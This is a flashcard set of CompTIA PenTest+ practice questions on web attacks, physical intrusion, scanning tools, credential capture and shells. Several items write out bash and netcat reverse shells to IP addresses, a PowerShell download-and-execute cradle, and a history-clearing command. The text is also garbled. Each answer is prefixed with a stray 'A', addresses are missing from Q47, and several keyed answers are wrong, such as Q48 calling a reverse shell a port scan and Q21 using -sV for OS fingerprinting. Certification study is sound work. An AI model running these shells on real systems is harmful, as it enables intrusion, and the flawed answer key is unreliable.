CompTIA PenTest+ Practice Test Chapter 7 Practice Exam 2 (Sybex: Panek, Crystal, Tracy) Flashcards

Question 1

Q

You are a penetration tester, and you are conducting a test for a new client. The client wants you to review a new web application for availability. Which type of attack should the tester utilize?

A.TCP SYN flood
B.SQL injection
C.Cross-site scripting (XSS)
D.XMAS scan

Answer

A

A.TCP SYN flood

Explanation:
A TCP SYN flood (also known as a SYN flood) is a form of denial of service (DoS) attack in which a tester sends a succession of SYN requests to the target’s system in an attempt to consume enough server resources to make the system unresponsive to genuine traffic. This exploits part of the normal TCP three-way handshake and consumes resources on the targeted server and renders it unresponsive.

Panek, Crystal; Tracy, Robb. CompTIA PenTest+ Practice Tests (p. 348). Wiley. Kindle Edition.

Question 2

Q

You are a penetration tester, and you are conducting a test for a new client. You are conducting a scan of your client’s web application. During the review of the scan results, which of the following vulnerabilities would be the most critical and should be prioritized for exploitation?

A.Clickjacking
B.Expired certificate
C.Fill path disclosure
D.Stored cross-site scripting (XSS)

Answer

A

D.Stored cross-site scripting (XSS)

Explanation:
Stored cross-site scripting (XSS) is the most dangerous type of cross-site scripting. Web applications that allow users to store data are potentially exposed to this type of attack. Stored XSS occurs when a web application gathers input from a user that might be malicious and then stores that input in a data store for later use.

Panek, Crystal; Tracy, Robb. CompTIA PenTest+ Practice Tests (p. 348). Wiley. Kindle Edition.

Question 3

Q

You are a penetration tester, and you are conducting a test for a new client. The client has asked you to conduct a test on a web application. You discover that the user login process sends form field data by using the HTTP GET method. To reduce the risk of exposing sensitive data, the HTML form should be sent using which method?

A.The HTTP OPTIONS method
B.The HTTP POST method
C.The HTTP PUT method
D.The HTTP TRACE method

Answer

A

B.The HTTP POST method

Explanation:
Forms in HTML can use either method=”POST” or method=”GET” (default) in the element. The method specified determines how form data is submitted to the server. With GET, the parameters remain in the browser history because they become part of the URL. With POST, the parameters are not saved in browser history. GET is less secure compared to POST.

Question 4

Q

You are a penetration tester, and you are conducting a test for a new client. You and the client are having a discussion regarding race condition exploitation. Which of the following is an example of race condition?

A.Cross-site request forgery (XSRF)
B.Hard-coded credentials
C.SQL injection (SQLi)
D.Time of check to time of use (TOCTTOU)

Answer

A

D.Time of check to time of use (TOCTTOU)

Explanation:
Race conditions occur when the security of a code segment depends upon the sequence of events occurring within the system. The time-of-check-to-time-of-use (TOCTTOU) issue is a race condition that occurs when a program checks access permissions too far in advance of a resource request.

Panek, Crystal; Tracy, Robb. CompTIA PenTest+ Practice Tests (p. 348). Wiley. Kindle Edition.

Question 5

Q

You are a penetration tester, and you are conducting a test for a new client. You are looking to start a session hijacking attack against your client’s web application. What information is important to obtain to ensure that your attack will be a success?

A.A session cookie
B.A session ticket
C.A username
D.A user password

Answer

A

A.A session cookie

Explanation:
Websites use HTTP cookies to keep sessions over time. If a tester is able to get a copy of the user’s session cookie, then they can use that cookie to impersonate the user’s browser and hijack the authenticated session. Attackers who are able to acquire the session cookie used to authenticate a user’s web session can hijack that session and take charge of the user’s account. Cookies used for authentication should always be securely created and transmitted only over secure, encrypted communications channels.

Panek, Crystal; Tracy, Robb. CompTIA PenTest+ Practice Tests (p. 348). Wiley. Kindle Edition.

Question 6

Q

A number of employees have recently become the victims of a phishing attack. They received an email that looked like it came from the president of the company. The email stated that the employees would receive disciplinary action if they did not do as the email indicated and click a link in the message. What principle of social engineering did the attacker use?

A.Authority
B.Fear
C.Scarcity
D.Social proof

Answer

A

A.Authority

Explanation:
Social engineering targets people instead of computers and relies on individuals or groups breaking security procedures, policies, and rules. Social engineering can be done in person, over the phone, by text messages, or by email. In this scenario, the attacker used the social engineering principle of authority. Authority follows the belief that people will tend to obey authority figures, even if they are asked to perform objectionable acts.

Panek, Crystal; Tracy, Robb. CompTIA PenTest+ Practice Tests (p. 348). Wiley. Kindle Edition.

Question 7

Q

You are a penetration tester, and you are conducting a test for a new client. You run the following from an exploited machine:

python -c ‘import pty; pty.spawn(“/bin/bash”)’

What action are you performing?

A.You are creating a sandbox.
B.You are capturing the credentials.
C.You are removing the Bash history.
D.You are upgrading the shell.

Answer

A

D.You are upgrading the shell.

Explanation:
The pty module lets a penetration tester spawn a pseudoterminal that can fool commands like su into thinking they are being executed in a proper terminal. To upgrade the shell, just run the command shown. su is a Unix command that stands for substitute user. It is used by a computer user to execute commands with the privileges of another user account. When executed, it invokes a shell without changing the current working directory or the user environment.

Panek, Crystal; Tracy, Robb. CompTIA PenTest+ Practice Tests (pp. 348-349). Wiley. Kindle Edition.

Question 8

Q

You are a penetration tester, and you are conducting a test for a new client. You have found a few unquoted service paths during your testing of the client’s network. How can you use these vulnerabilities to your advantage?

A.By attempting to crack the service account passwords
B.By attempting DLL hijacking attacks
C.By attempting to locate weak file and folder permissions
D.By attempting privilege escalation attacks

Answer

A

D.By attempting privilege escalation attacks

Explanation:
Privilege escalation attacks are frequently categorized into two major types: vertical and horizontal. Vertical escalation attacks focus on testers gaining higher privileges. Horizontal escalation attacks move sideways to other accounts or services that have the same level of privileges. An unquoted service path is a vulnerability in Windows. When a service is started, Windows tries to locate it. Usually, services are well-defined with quotation marks. But, there are times when a service path might contain spaces or are not surrounded by quotation marks. Testers can use the unquoted service paths to escalate privileges.

Panek, Crystal; Tracy, Robb. CompTIA PenTest+ Practice Tests (p. 349). Wiley. Kindle Edition.

Question 9

Q

Recently, a user has noticed that their machine has been acting irregular over the past week. They have been experiencing input lag, and the system is acting sluggish. The user has found a few text files that appear to contain bits of their emails and some instant messenger conversations. The user runs a virus scan, but nothing was detected. What type of malware may be affecting this machine?

A.Backdoor
B.Keylogger
C.Ransomware
D.Rootkit

Answer

A

B.Keylogger

Explanation:
A keylogger is software and hardware that can be useful as part of an ongoing exploitation process. Capturing keystrokes provides insight into the actions taken by users, and it can be a valuable source of credentials and other confidential information. A keylogger is software that tracks or logs the keys struck on a keyboard. This is usually done with malicious intent to collect account information, credit card numbers, usernames, passwords, and other private data.

Panek, Crystal; Tracy, Robb. CompTIA PenTest+ Practice Tests (p. 349). Wiley. Kindle Edition.

Question 10

Q

You are a penetration tester, and you are conducting a test for a new client. You have been asked to assess your client’s physical security by gaining access into the corporate office. You are looking for a method that will allow you to enter the building during both business hours and after hours. What would be the most effective method for you to attempt?

A.Attempt badge cloning.
B.Attempt lock picking.
C.Attempt a lock bypass.
D.Attempt piggybacking.

Answer

A

A.Attempt badge cloning.

Explanation:
With badge cloning, the tester can clone the badge of a staff member to gain entry into the facility. One of the most common techniques is to clone radio-frequency identification (RFID) tags. Given this scenario of trying to obtain access both during business hours and after hours, badge cloning is the best option.

Panek, Crystal; Tracy, Robb. CompTIA PenTest+ Practice Tests (p. 349). Wiley. Kindle Edition.

Question 11

Q

You are a penetration tester, and you are conducting a test for a new client. You are attempting a physical security assessment, and you want to use an “under-the-door-tool” during the test. Which of the following intrusion techniques should you use?

A.Egress sensor triggering
B.Lock bumping
C.Lock bypass
D.Lock picking

Panek, Crystal; Tracy, Robb. CompTIA PenTest+ Practice Tests (p. 234). Wiley. Kindle Edition.

Answer

A

C.Lock bypass

Explanation:
Lock bypass is simply that: bypassing locks without picking them. In this scenario, the tester is attempting a physical security assessment with the use of an under-the-door tool, which goes underneath a door and pulls open a door handle from the inside.

Panek, Crystal; Tracy, Robb. CompTIA PenTest+ Practice Tests (p. 349). Wiley. Kindle Edition.

Question 12

Q

You and a colleague are discussing an upcoming physical security assessment. The discussion turns to mantraps. Which of the following types of physical security attacks does a mantrap utilize?

A.Impersonation
B.Lock picking
C.Piggybacking
D.Shoulder surfing

Panek, Crystal; Tracy, Robb. CompTIA PenTest+ Practice Tests (p. 234). Wiley. Kindle Edition.

Answer

A

C.Piggybacking

Explanation:
Piggybacking attacks rely on following employees in through secured doors or other entrances. A high-security organization may use mantraps to prevent piggybacking and tailgating. A properly implemented mantrap will allow only one person through at a time, and that person will have to unlock two doors, only one of which can be unlocked and opened at a time.

Question 13

Q

You are a penetration tester, and you are completing a test for a new client. You run the chkconfig –del command at the end of an engagement. Why did you run this command?

A.To check for persistence
B.To enable persistence
C.To remove the persistence
D.To report persistence

Answer

A

C.To remove the persistence

Explanation:
Chkconfig is a tool for managing which run levels a service will run at. Chkconfig can be used to view or change the run level of a service. Using chkconfig –del will set the named service to not run at the current run level and will remove the persistence.

Question 14

Q

You are a penetration tester, and you are completing a test for a new client. You have successfully exploited an application vulnerability and now need to remove the command history from the Linux session. What command will remove the command history?

A>$ cat history /clear
B.$ history -c
C.$ history –remove
D.$ rm -f ./history

Answer

A

B.$ history -c

Explanation:
The bash history keeps a record of all commands executed by a tester on the Linux command line. This allows the tester to easily run previously executed commands by using the up and down arrow keys to scroll through the command history file. The main reason for removing command-line history from the Linux terminal is to prevent another user from using the tester’s previous commands. To delete or clear all the entries from bash history, use the history command with the -c option: $ history -c.

Question 15

Q

You and a colleague are discussing different utilities that can be used when performing a penetration test. Which of the following is a utility that can be used on Windows systems to establish command-line access to the console of a remote Windows system, similar to the older Telnet client?

A.PsExec
B.Remote Login (Rlogin)
C.Remote Shell (RSH)
D.Virtual Network Computing (VNC)

Answer

A

A.PsExec

Explanation:
PsExec is a command-line tool that lets you execute processes on remote systems and redirect console applications’ output to the local system so that the applications appear to be running locally. It is a lightweight Telnet replacement that allows you to execute processes on other systems.

Question 16

Q

You and a colleague are discussing different utilities that can be used when performing a penetration test. Which of the following will allow for remote management and data gathering and is installed on all Windows systems?

A.Samba (SMB)
B.Virtual Network Computing (VNC)
C.Windows Management Instrumentation (WMI) D.Windows Remote Desktop (RDP)

Answer

A

C.Windows Management Instrumentation (WMI)

Explanation:
Windows Management Instrumentation (WMI) allows for remote management and data gathering and is installed on all Windows systems, making it an attractive target for attackers and penetration testers. WMI provides users with information about the status of local or remote computer systems. It also supports actions such as the following:

The configuration of the security settings

The system properties

The permissions for authorized users and user groups The drive labels

The scheduling of processes to run at specific times

Backing up the object repository

Enabling or disabling error logging WMI can also allow the remote execution of commands, file transfers, and data gathering from files and the Registry.

Question 17

Q

You are a penetration tester, and you are conducting a test for a new client. You want to use nmap to scan a remote system. You use the following command: nmap 142.78.32.0/24 How many TCP ports will you be scanning?

A.256
B.1,000
C.1,024
D.65,535

Answer

A

B.1,000

Explanation:
Using nmap’s basic functionality is quite simple. Port scanning a system just requires that nmap be installed and that you provide the target system’s hostname or IP address. By default, nmap scans the 1,000 most common ports for both TCP and UDP. However, the full range of ports available to both TCP and UDP services is from 1–65,535. In this scenario, since you did not specify exactly how many ports to scan, it will scan the default of 1,000.

Question 18

Q

You are a penetration tester, and you are conducting a test for a new client. You run the following nmap scan on a computer: nmap -sV 192.168.10.5. The client has indicated that they have disabled Telnet from their environment. However, the nmap scan results show that port 22 is closed and that port 23 as open to SSH. What might this have happened to cause this?

A.The organization did not disable Telnet.
B.The nmap results contain a false positive for port 23.
C,The service is running on a nonstandard port.
D.Port 22 is filtered.

Answer

A

A.The organization did not disable Telnet.

Explanation:
Network Mapper (nmap) is used to discover hosts and services on a computer network by sending packets and analyzing the responses. Nmap will identify what devices are running on a client’s systems, discover hosts and services that are available, find open ports, and detect security risks. In this scenario, the client did not disable Telnet because port 23 is still open. Telnet is a client-server protocol, based on a reliable connection-oriented transport. Typically, this protocol is used to establish a connection to Transmission Control Protocol (TCP) by using port 23, where a Telnet server application (telnetd) is listening.

Question 19

Q

You are a penetration tester, and you are conducting a test for a new client. You plan on using an hping command to send traffic to a remote system. What type of traffic will the remote system see if you use the script

hping remoteclient.com -S -V -p 80?

A.HTTP traffic to TCP port 80
B.HTTPS traffic to TCP port 80
C.TCP SYNs to TCP port 80
D.TCP three-way handshake to TCP port 80

Answer

A

C.TCP SYNs to TCP port 80

Explanation:
Hping is a command-line tool that allows testers to generate network traffic. Hping is popular because it allows you to create custom packets. In this scenario, you will be sending TCP SYNs to TCP port 80. The -S switch asks hping to send SYN traffic, the -V switch is verbose mode, and the -p switch indicates the port.

Question 20

Q

You are a penetration tester, and you are conducting a test for a new client. You plan on using nmap. Which nmap switch must you use if you want to scan all the TCP ports on an identified device?

A.-p- 1-65535
B.-p ALX,
C.-p 1-65544
D.-port 1-65534

Answer

A

A.-p- 1-65535

Explanation:
Nmap is the most commonly used command-line vulnerability scanner and is a free, open source tool. It provides a broad range of capabilities, including multiple scan modes intended to bypass firewalls and other network protection devices. Nmap is a port scanner. To scan for ports, you will want to use the -p (only scan specified ports). This option specifies which ports you want to scan and overrides the default scan. Individual port numbers or ranges are acceptable. Ranges are separated by a hyphen (for example 1–1023). The beginning and/or end values of a range may be omitted, causing nmap to use 1 and 65535, respectively. So, you can specify -p- to scan ports from 1 through 65535. Port scanning a system simply requires that nmap be installed and that you provide the target system’s hostname or IP address.

Question 21

Q

You are a penetration tester, and you are conducting a test for a new client. You plan on using nmap to conduct OS fingerprinting using a company provided text file that contains a list of all the IP addresses. What switches would you need to include in your code to conduct OS fingerprinting using the text file? (Choose two.)

A.-iL 
B.-O 
C.-oN 
D.-oX 
E.-sS 
F.-sV

Answer

A

A.-iL
F.-sV

Explanation:
One of nmap’s best-known features is remote OS detection using TCP/IP stack fingerprinting. Nmap sends a series of TCP and UDP packets to the remote host and examines the responses. -iL : This is the input from list of hosts/networks. -sV: This probes open ports to determine service/version information.

Question 22

Q

You are a penetration tester, and you are conducting a test for a new client. You want to perform passive reconnaissance on the client’s external domain. What would be the best choice for you to use?

A.CeWL
B.OpenVAS
C.Peach
D.Shodan

Answer

A

D.Shodan

Explanation:
Passive reconnaissance is also known as open-source intelligence (OSINT). The idea behind passive reconnaissance is to gather information about a target using only publicly available resources. Shodan is a specialized search engine that provides discovery of specific types of computers and devices that are connected to the Internet by using a variety of filters. Peach is a fuzzing tool, OpenVAS performs network vulnerability scans, and CeWL is a custom wordlist generator that searches websites for keywords that may be used in password-guessing attacks.

Question 23

Q

You are a penetration tester, and you are conducting a test for a new client. You have successfully exploited a DM2 server that seems to be listening to an outbound port. You want to forward that traffic back to a device. What are the best tools to do this? (Choose two.)

A.Cain and Abel 
B.Netcat 
C.Nmap 
D.Secure Shell (SSH) 
E.Tcpdump 
F.Wireshark

Answer

A

D.Secure Shell (SSH)
F.Wireshark

Explanation:
In this scenario, the best options are SSH and Wireshark. Secure Shell (SSH) provides secure encrypted connections
between systems. SSH provides remote shell access via an encrypted connection. SSH is used for secure command-line access to systems, typically via TCP port 22, and is found on devices and systems of all types. Because SSH is so common, testing systems that provide an SSH service is a very attractive option for a penetration tester. Wireshark is a protocol analyzer that allows penetration testers to eavesdrop on and dissect network traffic. Wireshark also allows for capturing network traffic from wireless networks.

Question 24

Q

You are a penetration tester, and you are conducting a test for a new client. You are conducting a test and have compromised the client’s host. What is the correct syntax to create a Netcat listener on this device?

A.nc -lp 4444 -e /bin/bash
B.nc -lvp 4444 /bin/bash
C.nc -p 4444 /bin/bash
D.nc -vp 4444 /bin/bash

Answer

A

A.nc -lp 4444 -e /bin/bash

Explanation:
Netcat can be used to set up a Telnet server in a matter of seconds. You can specify the shell you want Netcat to run at a successful connection with the -e parameter. In this scenario, the proper syntax would be nc -lp 444 -e /bin/bash. The nc tells Windows to run the nc.exe file with the following arguments:

l: Specifies listen mode, for inbound connections
p: Specifies a port to listen for a connection on
e: Tells what program to run once the port is connected to (cmd.exe)
v: Be verbose, printing out messages on standard error, such as when a connection occurs

Question 25

Q

You are a penetration tester, and you are conducting a test for a new client. You want to target the NetBIOS name service. Which of the following commands is the most likely to be used to exploit the NetBIOS name service?

A.arpspoof
B.burpsuite
C.nmap
D.responder

Answer

A

D.responder

Explanation:
Responder is a toolkit that is used to answer NetBIOS queries from Windows systems on a network. Responder is a powerful tool when exploiting NetBIOS responses. It can target individual systems or entire local networks, allowing you to analyze or respond to NetBIOS name services, pretending to be the system that the query is intended for.

Question 26

Q

You are a penetration tester, and you are conducting a test for a new client. You want to conduct open-source intelligence (OSINT) data collection from publicly available sources. Which of the following tools can you use? (Choose two.)

A.BeEF 
B.Dynamo
C.Maltego 
D.SET 
E.Shodan 
F.Wireshark

Answer

A

C.Maltego
E.Shodan

Explanation:
There are a variety of tools that assist with this OSINT collection:

Censys is a web-based tool that probes IP addresses across the Internet and then provides penetration testers with access to that information through a search engine.

Fingerprinting Organizations with Collected Archives (FOCA) is an open source tool used to find metadata within Office documents, PDFs, and other common file formats.

Maltego is a commercial product that assists with the visualization of data gathered from OSINT efforts.

Nslookup tools help identify the IP addresses associated with an organization

Recon-ng is a modular web reconnaissance framework that organizes and manages OSINT work.

Shodan is a specialized search engine to provide discovery of vulnerable Internet of Things (IoT) devices from public sources.

theHarvester scours search engines and other resources to find email addresses, employee names, and infrastructure details about an organization.

Whois tools gather information from public records about domain ownership.

Question 27

Q

You are a penetration tester, and you are conducting a test for a new client. You want to capture user hashes on a Windows network. You want to gather broadcast messages and have the ability to authenticate with hashes once you have captured them. What tool should you use?

A.impacket
B.Metasploit
C.Responder
D.Wireshark

Answer

A

A.impacket

Explanation:
Impacket is a collection of Python classes for working with network protocols. Impacket provides a wide range of tools, including the ability to authenticate with hashes once you have captured them. Metasploit’s SMB capture mode, Responder, and Wireshark can all capture SMB hashes from broadcasts, but in this scenario, you also want the ability to authenticate with hashes once you’ve captured the messages.

Question 28

Q

You are a penetration tester, and you are conducting a test for a new client. You want to perform a credential brute-force attack on a client’s application. Which tool should you use?

A.Hashcat
B.Hydra
C.John the Ripper
D.Peach

Answer

A

B.Hydra

Explanation:
In a credentials brute-force attack, the tester will try to log in to the application using every username and password. Hydra is a brute-forcing tool that can crack systems using password guessing.

Question 29

Q

You are a penetration tester, and you are conducting a test for a new client. As a part of your penetration test, you need to establish an active connection to the computer systems and devices at your client’s location to enumerate and fingerprint them. Which of the following tools could you use to do this? (Choose two.)

A.Aircrack-ng
B.hping
C.nmap
D.whois

Answer

A

B.hping
C.nmap

Explanation:
The nmap and hping utilities can be used to actively enumerate and fingerprint target systems. Hping is a command-line tool that allows testers to artificially generate network traffic. Hping is popular because it allows you to create custom packets. Nmap is the most commonly used command-line vulnerability scanner and is a free, open-source tool. It provides a broad range of capabilities, including multiple scan modes intended to bypass firewalls and other network protection devices. Whois is a tool that gathers information from public records about domain ownership. Aircrack-ng provides the ability to conduct replay and deauthentication attacks and to act as a fake access point.

Question 30

Q

You are a penetration tester, and you are conducting a test for a new client. You want to use Metasploit. Which command will start the Metasploit database?

A.db_connect
B.db_init
C.msfconsole
D.msfvenom

Answer

A

C.msfconsole

Explanation:
Metasploit is launched by running msfconsole from the command line. MSFconsole is located in the /usr/share/metasploit framework/msfconsole directory.

Question 31

Q

You are a penetration tester, and you are conducting a test for a new client. You want to capture NTLM v2 hashes over the wire for use in a pass-the-hash attack. Which tool does not allow you to capture NTLM v2 hashes over the wire?

A.Ettercap
B.Mimikatz
C.Metasploit
D.Responder

Answer

A

B.Mimikatz

Explanation:
Mimikatz is an open source utility that enables the viewing of credential information from the Windows Local Security Authority Subsystem Service (LSASS) using its sekurlsa module, which includes plaintext passwords, and Kerberos tickets, which can then be used for attacks such as pass-the-hash and pass-the-ticket. In this scenario, however, the question states “over the wire.” Mimikatz is the only tool that cannot be used that way.

Question 32

Q

You are a penetration tester, and you are conducting a test for a new client. You have captured NTLM hashes and want to conduct a pass-the-hash attack. Unfortunately, you don’t know which systems on the network might accept the hash. What tool should you use to conduct the test?

A.Drozer
B.Hashcat
C.Hydra
D.Kismet

Answer

A

C.Hydra

Explanation:
Hydra is designed to include support for NTLM hashes as a password. Hashcat is a password cracking and recovery tool. Drozer is a framework for Android security assessments. Kismet is an 802.11 layer 2 wireless network detector, sniffer, and intrusion detection system. Hydra, often known as thc-hydra, is a brute-force dictionary attack tool that is designed to work against a variety of protocols and services.

Question 33

Q

You are a penetration tester, and you are conducting a test for a new client. You want to deploy a malicious website as part of the test to exploit the browsers belonging to the client’s employees. What tool can the test utilize?

A.Browser Exploitation Framework (BeEF)
B.Metasploit
C.Open Web Application Security Project (OWASP) D.Social Engineer Toolkit (SET)

Answer

A

A.Browser Exploitation Framework (BeEF)

Explanation:
The Browser Exploitation Framework (BeEF) is designed for this type of attack. BeEF provides an automated toolkit for using social engineering to take over a client’s web browser. You can then use various phishing and social engineering techniques to get employees to visit the site.

Question 34

Q

You are a penetration tester, and you are conducting a test for a new client. You are planning to create a custom wordlist of common words and catchphrases about your client using the client’s website. What is the name of the tool that you can utilize to assist with building a custom wordlist?

A.CeWL
B.Hashcat
C.Hydra
D.Medusa

Answer

A

A.CeWL

Explanation:
The Custom Word List (CeWL) generator is a Ruby application that allows a tester to scour a website based on a URL and depth setting and then generate a wordlist from the files and web pages it finds. Running CeWL against a target organization’s websites can help generate a custom wordlist. Building a custom wordlist can be particularly useful if you have gathered a lot of information about your target organization.

Question 35

Q

You are a penetration tester, and you are conducting a test for a new client. During the internal penetration test, several multicast and broadcast name resolution requests are observed moving through the network. You want to impersonate network resources and collect authentication requests. What tool should you use?

A.Ettercap
B.Medusa
C.Tcpdump
D.Responder

Answer

A

D.Responder

Explanation:
In this scenario, the question specifically states “name resolution requests.” In this case, Responder is the best choice. Responder is a toolkit used to answer NetBIOS queries from Windows systems on a network. Tcpdump is a type of packet analyzer software utility that monitors and logs TCP/IP traffic passing between a network and the computer on which it is executed. Ettercap is a free and open source network security tool for man-in-the-middle attacks on LAN. Medusa is a brute-force login attack tool that supports a variety of protocols and services.

Question 36

Q

You are a penetration tester, and you are conducting a test for a new client. You want to do a search to see your client’s computers and devices that are connected to the Internet. You want to be able to use a variety of filters. What tool can you use to accomplish this?

A.Censys
B.Shodan
C.TheHarvester
D.Whois

Answer

A

B.Shodan

Explanation:
Shodan is a popular security search engine and provides prebuilt searches as well as categories of search for industrial control systems, databases, and other common search queries. Shodan is a search engine that lets the user find specific types of computers and devices that are connected to the Internet using a variety of filters. Some have described it as a search engine of service banners, which are metadata that the server sends
back to the client. Using Shodan for penetration testing requires some basic knowledge of banners including HTTP status codes.

Question 37

Q

You are a penetration tester, and you are conducting a test for a new client. You want to do a search to see whether your client’s computers and devices are connected to the Internet and to see whether their geoIP information is available. What tool can you use to accomplish this?

A.Censys
B.Shodan
C.TheHarvester
D.Whois

Answer

A

A.Censys

Explanation:
Much like Shodan, Censys is a security-oriented search engine. When you dig into a host in Censys, you will also discover geoIP information, if it is available, and a comprehensive summary of the services the host exposes providing more detailed information. GeoIP refers to the method of locating a computer terminal’s geographic location by identifying that terminal’s IP address.

Question 38

Q

You are a penetration tester, and you are conducting a test for a new client. You are conducting a test on a specific client database server. You want to detect any vulnerabilities on this server. What tool will best assist you?

A.Nessus
B.Nikto
C.Sqlmap
D.OpenVAS

Answer

A

C.Sqlmap

Explanation:
Sqlmap is an open source tool used to automate SQL injection attacks against web applications with database back-ends. Sqlmap is a commonly used open source database vulnerability scanner that allows security administrators to probe web applications for database vulnerabilities. For this scenario, Sqlmap is a dedicated database vulnerability scanner and is the most appropriate tool.

Question 39

Q

You are a penetration tester, and you are conducting a test for a new client. During the gray box penetration test you want to be able to set up a reverse shell exploit where the compromised system on the target network “calls home” to a listener set up on your laptop and to allow you to remotely control the compromised system. What remote access tool could you use?

A.Wireshark
B.Impacket
C.Netcat
D.Responder

Answer

A

C.Netcat

Explanation:
Netcat is an open source network debugging and exploration utility that can read and write data across network connections, using the TCP/IP protocol.

Netcat is also a popular remote access tool, and it has a small footprint that makes it easily portable
to many systems during a penetration test.

Setting up a reverse shell with netcat on Linux looks like this:

nc [IP of remote system] [port] -e /bin/sh

Setting up a reverse shell with netcat on Windows looks like this:

nc [IP of remote system] [port] -e cmd.exe

It is also fairly easy to set up netcat as a listener by using this:

nc -l -p [port]

Question 40

Q

You are a penetration tester, and you are conducting a test for a new client. During a gray box penetration test you want to be able to set up a bind shell exploit where a listener is set up on a compromised system on the client’s network. Which remote access tools can you use to do this? (Choose two.)

A.Empire 
B.Ncat 
C.Netcat 
D.Powersploit 
E.Searchsploit

Answer

A

B.Ncat
C.Netcat

Explanation:

Netcat is an open source network debugging and exploration utility that can read and write data across network connections, using the TCP/IP protocol. Netcat is also a popular remote access tool, and it has a small footprint that makes it easily portable to many systems during a penetration test.

Setting up a reverse shell with netcat on Linux looks like this:

nc [IP of remote system] [port] -e /bin/sh

Setting up a reverse shell with netcat on Windows looks like this:

nc [IP of remote system] [port] -e cmd.exe

It is also fairly easy to set up netcat as a listener by using this:

nc -l -p [port]

Ncat is designed as a successor to Netcat and has the same functionality including a variety of additional capabilities, including using SSL, proxies, and tricks such as sending email or chaining Ncat sessions together as part of a chain to allow pivoting.

Question 41

Q

You are a penetration tester, and you are conducting a test for a new client. During a gray box penetration test, you want to poison queries for the client’s domain controller to redirect client requests to your laptop and to capture usernames and hashed passwords. What tool could you use?

A.Empire
B.Impacket
C.Responder
D.Searchsploit

Answer

A

C.Responder

Explanation:
Responder is a toolkit that is used to answer NetBIOS queries from Windows systems on a network. Responder is a powerful tool when exploiting NetBIOS responses. It can target individual systems or entire local networks, allowing you to analyze or respond to NetBIOS name services, pretending to be the system that the query is intended for. Responder exploits the trust in a service response to tell the client that the responder host is a legitimate service provider, causing it to send its hashed credentials, which the owner of the Responder host can then use to authenticate to legitimate servers.

Question 42

Q

You are a penetration tester, and you are conducting a test for a new client. You are writing the following Python code:

if 1 == 1:
      print("howdy")
 elif 3 == 3:
      print("howdy")
 else:
      print("howdy")

How many times will this code print the word howdy?

A.0
B.1
C.2
D.3

Answer

A

B.1

Explanation:
In this scenario, you are using a conditional execution, so only one clause is executed. So, in this case, the code following the if clause will execute, making it impossible for the elif or else clause to execute. Conditional execution allows developers to write code that executes only when certain logical conditions are met. The most common conditional execution structure is the if.. then ..else statements.

Question 43

Q

You are a penetration tester, and you are conducting a test for a new client. You are analyzing a script to determine why the script is not returning the correct results as expected. The expected results should be True.

 root:~# cat ./myscript.sh
 #!/bin/bash
 source=10
 let dest=5+5 
if [ 'source' = 'dest' ]; then
    echo "True"
 else
    echo "False" 
fi 
#End of File 
root:~# ./myscript.sh
 False

By reviewing the script, how should you correct the errors to return the correct results? (Choose two.)

A.Change "fi" to "EndIf". 
B.Remove "let" in front of dest=5+5. 
C.Change "=" to "-eq". 
D.Change "'source'" and "'dest'" to "'Ssource'" and "'Sdest'". 
E.Change "else" to "elif".

Answer

A

B.Remove “let” in front of dest=5+5.
C.Change “=” to “-eq”.

Explanation:
Given this scenario, the word let does not need to be included in the script, so it can be removed, and in Bash, the equivalent to = is -eq, which is the arithmetic binary operator. Once these modifications are made, the script will work as expected.

Question 44

Q

You are a penetration tester, and you are conducting a test for a new client. You want to create an array by using a PowerShell script. Which line of code would you use?

A.$ports = 20, 25, 80, 443 
B.ports = (20,25,80,443) 
C.ports = [20,25,80,443] 
D.$ports= [20,25,80,443]

Answer

A

A.$ports = 20, 25, 80, 443

Explanation:
PowerShell requires the use of the $ before an array name in an assignment operation. The elements of the array are then provided as a comma-separated list. Option B would work in Bash, option C would work in Ruby or Python, and option D does not follow the correct syntax for a PowerShell command. PowerShell is much simpler in the way that you declare and use variables. You just need to remember to precede the variable name with a $, whether it’s for setting, changing, or retrieving the value stored in that variable.

Question 45

Q

You are a penetration tester, and you are conducting a test for a new client. You intend to run the following command on your client’s system: bash -i >& /dev/tcp/10.2.4.6/443 0>&1 What additional command would need to be executed on your Linux system to make the previous command work?

A.nc -nvlp 443
B.nc 10.2.4.6 443
C.nc -w3 10.2.4.6 443
D.nc-/bin/ah 10.2.4.6 443

Answer

A

A.nc -nvlp 443

Explanation;
You will want to create a Netcat listener that waits for the inbound shell from the target machine. To get a shell, Netcat uses nc -nvlp 443 to listen for incoming connections Using this syntax, you are telling Netcat (nc) to not resolve names (-n), to be verbose printing out when a connection occurs (-v), and to listen (-l) on a given local port (-p).

Question 46

Q

You are a penetration tester, and you are conducting a test for a new client. You are using PowerShell to conduct a test. You are using the following PowerShell command:

powershell.exe IEX (New-Object Net.Webclient).downloadstring(http://site/script.ps1”);Invoke-Command

What action is being performed by this command?

A.It executes a remote script.
B.It incorporates an object.
C.It runs an encoded command.
D.It sets the execution policy.

Answer

A

A.It executes a remote script.

Explanation:
It runs an encoded command. It sets the execution policy.
In this scenario, the PowerShell command given will execute a remote script. By using the PowerShell IEX command, it will invoke an expression. The IEX cmdlet evaluates or runs a specified string as a command and returns the results of the expression or command. The PowerShell Invoke-Command cmdlet runs commands on a local or remote computer and returns all output from the commands, including errors. By using a single Invoke-Command command, you can run commands on multiple computers.

Question 47

Q

You are a penetration tester, and you are conducting a test for a new client. You gain access into an unrestricted system network by using port 443. You want to create a reverse shell from the client back to your computer. Which method will you most likely use?

A.bash -i >& /dev/tcp//443 0>&1
B.nc -e /bin/sh 443
C.perl -e ‘use SOCKET’; $i=’; $p=’443;
D.ssh superadmin@ -p 443

Answer

A

A.bash -i >& /dev/tcp//443 0>&1

Explanation:
A reverse shell opens a communication channel on a port and waits for incoming connections. The client’s machine acts as a server and initiates a connection to the tester’s machine. This is what is done by using the following:

bash -i >& /dev/tcp//443 0>&1

Given the options, option A is the best option. Options B and C will not work because they are using the and not the , and option D is not correct because it is using the improper syntax.

Question 48

Q

You are a penetration tester, and you are conducting a test for a new client. During a penetration test, the following line of code was found in an exploited machine’s history file:

bin/bash -i >& /dev/tcp/192.168.0.10/80 0> &1

What best describes what this command line does?

A.A port scan has been performed.
B.It obtains the web server’s banner.
C.It redirects a teletypewriter (TTY) to a remote system.
D.It removes the error logs for the given IP.

Answer

A

A.A port scan has been performed.

Explanation:
In the Bash shell, a network socket can be opened to pass data through it. A TCP socket can be opened using /dev/tcp//. Bash is attempting to open a TCP connection to the corresponding socket. So, in this example, a port scan has been performed. Here’s a breakdown of the code: /bin/bash -i: Invokes an interactive Bash shell. > &/dev/tcp//: Pipes that shell to the tester. 0&1: Takes standard input and connects it to standard output. It does the same with standard error (2>).

Question 49

Q

